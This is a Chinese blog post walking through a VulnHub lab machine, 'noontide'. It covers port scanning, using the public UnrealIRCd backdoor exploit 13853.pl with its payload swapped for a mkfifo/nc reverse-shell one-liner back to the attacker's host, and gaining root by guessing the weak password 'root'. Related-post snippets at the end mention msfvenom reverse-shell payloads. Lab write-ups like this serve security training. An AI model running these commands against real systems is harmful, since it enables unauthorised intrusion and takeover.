靶场练习(9):noontide

已于 2024-09-15 00:48:14 修改
阅读量344 收藏 4
点赞数 13
分类专栏: vulnhub靶场练习 文章标签: 网络安全
于 2024-09-15 00:45:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dcy1124/article/details/142268242
版权

靶机ip:172.16.33.78

突破

端口扫描

sudo nmap -p- 172.16.33.78 --open

结果如下:

在这里插入图片描述

特定端口扫描

sudo nmap -p6667,6697,8067 -sV -A 172.16.33.78

结果如下:

在这里插入图片描述

针对陌生端口

首先想到用searchsploit:

searchsploit unrealircd

在这里插入图片描述

选择13853.pl

searchsploit -m 13853

查看其内容,将其中的payload<1>改成反弹脚本:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <本地ip> <反弹端口号> > /tmp/f

在这里插入图片描述

(打码内容为本地机ip)

之后按照代码中的usage提示正确使用该脚本,做好监听

在这里插入图片描述

perl 13853.pl 172.16.33.78 <三个端口均可> 1

点击发送,反弹成功,突破完成。
(注:由于本人取材发博客时该靶机出了些问题导致没有反弹成功,故没有突破成功的截图,望谅解。)

提权

升级终端

python3 -c 'import pty;pty.spawn("/bin/bash")'

弱口令提权

su
root

提权成功,打靶完成。

bebabong
关注
专栏目录
OSCP靶场5-noontide(irc、UnrealIRCd)
墨痕诉清风的博客
05-09 281
枚举我们从nmap开始,看看哪些端口是开放的。我们看到它只有一个开放端口,它是6667,UnrealIRCd正在运行。我们寻找是否有,并找到[1]。在看到exploit之后,我们看到我们可以在不需要exploit的情况下执行“exploit”手。开发我们让nc听…我们使用nc连接到IRC服务器,一旦连接,我们必须把AB;有效负载\n,我们将用一个命令替换“有效负载”,以便我们从一个反向shell。shell我们得到了shelllocal.txt一旦进入,我们寻找用户标志…权限提升。
VulnHub靶场之sunset:noontide
A_dmin的博客
09-30 1170
VulnHub靶场之sunset:noontide nmap扫描主机存活: 扫描端口,开放三个端口: emmm,irc是什么服务啊,就很迷,,百度搜索一波,,,好像是一个类似于网络聊天啥的东西 不太会啊,也没玩过这个,,,,直接searchsploit搜索一下版本好像是unreal: 还真有!使用第三个,,,,先下载到本地 使用msfvenom生成payload: 复制如上payload,打开13853.pl更改payload,一开始有五行直接删除其余四行,更改第一行: 然后保存运行: 监听4
sunset: noontide靶机渗透-vulnhub
m0_68117643的博客
07-18 1094
这台靶机(sunsetnoontide)运行在Vmware中无法获取靶机IP,换VirtualBox后NAT和桥接模式下也未获取到IP,仅在host-only模式下才找到靶机IP 突破点:反弹shell—root弱口令提权
vulnhub sunset: noontide
箭雨镜屋
03-23 1814
nmap扫描 ---- searchsploit搜索payload ---- Metasploit利用UnrealIRCd漏洞得到shell ---- su命令弱密码提权
vulhub-sunset:noontide
2201_75378806的博客
05-13 234
用msfvenom -p cmd/unix/reverse_perl LHOST=<attacker_IP> LPORT=4000 -f raw 生成一个perl的木马。在第一个payload里面输入生成的payload,其它的原来的payload全删掉,记得-e后面记得加\,;IRC的工作原理非常简单,您只要在自己的PC上运行客户端软件,然后通过因特网以IRC协议连接到一台IRC服务器上即可。IRC是Internet Relay Chat的英文缩写,中文称为互联网中继聊天,是一种网络聊天协议。
看完这篇 教你玩转渗透测试靶机vulnhub——Noontide
Aluxian_的博客
11-27 760
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。1.信息收集,端口扫描2.文件包含的利用3.john爆破获取密码4.Sudo su提权这个靶机比较简单啦 希望对刚入门得小白有帮助!🙂最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
实战打靶集锦-008- noontide
阿尔泰野狼的博客
02-26 463
本文记录了博主一次失败的打靶经历。
靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE
OneMoreThink
01-12 1011
打靶思路资产发现主机发现服务发现漏洞发现(获取权限)irc服务提升权限server用户sudosuidcron内核提权信息收集1、资产发现1.1、主机发现本次靶场SUNSET: NOONTIDE[1]指定IP,不涉及主机发现过程。1.2、服务发现使用命令sudo -u root 172.16.33.78 -n -Pn -p- --reason -sV -sC -O,发现主机开放的端口、提供的服务、...
Sunset: Vulnhub Walkthrough
08-23 170
主机扫描: ╰─ nmap -p1-65535 -sV -A 10.10.202.147 PORT STATE SERVICE VERSION21/tcp open ftp pyftpdlib 1.5.5| ftp-anon: Anonymous FTP login allowed (FTP code 230)|_-rw-r--r-- 1 root root 1062 Jul 29 00:00 backup| ftp-syst: | STAT: | FTP...
python-noontide:从notion.so页面创建静态网站
05-05
Python-Noontide是一个工具,主要用于将Notion.so的页面转换为静态网站。Notion.so是一个功能强大的笔记、项目管理和知识管理平台,它以其富文本编辑、数据库和灵活的页面结构深受用户喜爱。然而,尽管Notion提供了...
【每天读一点英文】gnuhpc注释版:Speak to us of Beauty
gnuhpc的专栏
02-08 1469
Speak to us of Beauty And a poet said, "Speak to us of Beauty." Where shall you seek beauty, and how shall you find her unless she herself be your way and your guide? And how shall you speak of her except she be the weaver of your speech? The ag
【每天读一点英文】gnuhpc注释版:The Love of Beauty
gnuhpc的专栏
02-08 1534
The Love of Beauty The love of beauty is an essential part of all healthy human nature. It is a moral quality. The absence of it is not an assured ground of condemnation, but the presence of it is an invariable sign of goodness of heart. In proportion to
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8503
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【水果识别】基于matlab GUI形态学水果大小识别【含Matlab源码 920期】.md
10-15
CSDN Matlab武动乾坤上传的资料均有对应的代码,代码均可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 图像识别:表盘识别、车道线识别、车牌识别、答题卡识别、电器识别、跌倒检测、动物识别、发票识别、服装识别、汉字识别、红绿灯识别、火灾检测、疾病分类、交通标志牌识别、口罩识别、裂缝识别、目标跟踪、疲劳检测、身份证识别、人民币识别、数字字母识别、手势识别、树叶识别、水果分级、条形码识别、瑕疵检测、芯片识别、指纹识别
【瑕疵检测】基于matlab瓶盖瑕疵检测【含Matlab源码 730期】.md
10-15
CSDN Matlab武动乾坤上传的资料均有对应的代码,代码均可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 图像识别:表盘识别、车道线识别、车牌识别、答题卡识别、电器识别、跌倒检测、动物识别、发票识别、服装识别、汉字识别、红绿灯识别、火灾检测、疾病分类、交通标志牌识别、口罩识别、裂缝识别、目标跟踪、疲劳检测、身份证识别、人民币识别、数字字母识别、手势识别、树叶识别、水果分级、条形码识别、瑕疵检测、芯片识别、指纹识别
Shapely-1.6.4.post2-cp35-cp35m-win_amd64.whl
10-15
Shapely-1.6.4.post2-cp35-cp35m-win_amd64.whl
Apache Flink CEP复杂事件处理详解及实战案例
10-15
内容概要:本文详细介绍了Apache Flink的FlinkCEP模块,讲解了其安装配置、事件流处理基础及其应用场景,其中包括电商欺诈检测、网络监控、实时交易系统的模式匹配以及社交媒体趋势分析的具体实现。通过多个实战示例演示了如何利用正则表达式定义复杂模式并在大数据流中识别有用的事件序列,适用于需要从实时数据流中挖掘价值的多种场景。 适用人群:具备一定大数据处理经验的研发人员、架构师以及相关领域的研究人员和技术爱好者。 使用场景及目标:针对金融反欺诈、网络安全、高频交易、物联网数据分析等领域,实现复杂事件模式的实时监测和处理。 其他说明:本文提供了大量的实践代码样本,旨在引导读者掌握Flink CEP的实际应用技巧。
SSM+JSP在线网课管理系统答辩PPT.pptx
最新发布
10-15
计算机毕业设计答辩PPT
稳压罐sw16_三维3D设计图纸.zip
10-15
稳压罐sw16_三维3D设计图纸.zip
英语知识应用网站 JAVA毕业设计 源码+数据库+论文 Vue.js+SpringBoot+MySQL.zip
10-15
英语知识应用网站 JAVA毕业设计 源码+数据库+论文 Vue.js+SpringBoot+MySQL 系统启动教程:https://www.bilibili.com/video/BV11ktveuE2d
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值